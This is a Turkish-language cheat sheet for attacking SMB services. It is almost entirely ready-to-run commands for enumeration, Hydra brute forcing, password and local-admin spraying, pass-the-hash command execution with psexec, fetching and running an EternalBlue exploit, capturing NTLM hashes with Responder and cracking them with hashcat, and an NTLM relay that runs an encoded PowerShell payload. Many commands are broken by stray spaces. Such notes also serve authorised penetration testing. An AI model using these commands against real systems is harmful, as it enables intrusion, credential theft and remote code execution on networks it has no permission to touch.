SMB Nedir?
SMB (Server Message Block) protokolü, ağ üzerindeki bilgisayarlar arasında dosya, yazıcı ve seri port paylaşımını sağlayan bir ağ protokolüdür. Microsoft tarafından geliştirilmiş olup, dosya ve yazıcı paylaşımı için yaygın olarak kullanılan bir protokoldür. SMB, ağ üzerindeki cihazların birbirleriyle iletişim kurmasına ve kaynakları paylaşmasına olanak tanır. Özellikle Windows işletim sistemlerinde yaygın olarak kullanılan SMB, çeşitli sürümleri ile zaman içinde geliştirilmiş ve güvenlik, performans ve uyumluluk konularında iyileştirmeler yapılmıştır. SMB protokolü, IT sektöründe ağ kaynaklarının yönetimi ve paylaşımı için kritik bir rol oynamaktadır.
Bağlanma
Copy smbclient -L 192.186.1.3 -N
smbclient -L 192.168.1.3 -U admin
smbclient //192.168.1.3/C $ -U administrator
mkdir /tmp/mount
mount -t cifs //192.168.240.248/transfer /tmp/mount -o username= "anonymous" ,password= "anonymous"
Enumeration
Sunucu bilgilerini listeler.
Copy enum4linux - ng . py - A - C 192.168 . 1 . 3
Brute Force
Hydra ile brute-force saldırısı yapma.
Copy hydra - l admin - P / usr / share / wordlists / rockyou . txt 192.168 . 1 . 3 smb
Anonymous SMB
Copy smbmap - H 192.168 . 1 . 0 / 24 - u ''
nxc smb 192.168 . 1 . 0 / 24 - u '' - p ''
smbmap - H 192.168 . 1 . 0 / 24 - u 'guest' - p ''
nxc smb 192.168 . 1 . 0 / 24 - u 'guest' - p ''
Password Spraying
Güçsüz bir parolayı bütün kullanıcılar için deneyebiliriz.
Copy nxc smb 192.168.1.3 -u users.txt -p 'Password123' -d example.local
nxc smb 192.168.1.3 -u users.txt -H ':xxxxxxxxxxxxxxxxxx' -d example.local
Local Admin Spraying
Kendi local admin parolamızı bütün domainde deneyebiliriz.
Copy nxc smb --local-auth 192.168.1.1/24 -u administrator -p 'Password123'
nxc smb --local-auth 192.168.1.1/24 -u administrator -H ':xxxxxxxxxxxxxxxxxxxx'
Kullanıcı Listeleme
Smb sunucusundaki kullanıcıları listeler.
Copy # Kullanıcı yok ise
enum4linux - ng - U 192.168 . 1 . 3
# Kullanıcı var ise
nxc smb 192.168 . 1 . 3 - u administrator - p password123 --users
# RID ile listeleme
nxc smb 192.168 . 1 . 1 - u administrator - p password123 --rid - brute
# Grupları listeleme
enum4linux - ng - G 192.168 . 1 . 3
# Grupları listeleme
nxc smb 192.168 . 1 . 1 - u administrator - p password123 --groups
# Giriş yapan kullanıcılar
nxc smb 192.168 . 1 . 1 - u administrator - p password123 --loggedon - users
# Paylaşımlar
nxc smb 192.168 . 1 . 1 - u administrator - p password123 --shares
Komut Çalıştırma
Bunu yapmak için ADMIN$ share'ı yazılabilir olmalı.
Copy # SMB Auth
impacket - psexec example . local / administrator : 'Password123' @ 192.168 . 1 . 3 cmd . exe
# Pass-the-hash
impacket - psexec example . local / administrator @ 192.168 . 1 . 3 cmd . exe - hashes : 7a38310ea6f0027ee955abed1762964b
# Windows
. / PsExec64 . exe - i \ \192.168.1.3 -u corp.local\john -p 'password123' cmd
EternalBlue MS17-010 (CVE-2017-0144)
Copy git clone https://github.com/d4t4s3c/Win7Blue.git ; cd Win7Blue ; chmod +x Win7Blue
./Win7Blue
Responder
Responder kendimize yapılan isteklerdeki ntlm hashlerini ele geçiren bir programdır.
Copy responder -I tun0
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force
NTLM Relay
Copy impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc <BASE64>"
Logged Users
Copy # Remote Registry Açık Olmalı (Default Açık Değil)
. \ PsLoggedon.exe \\ files04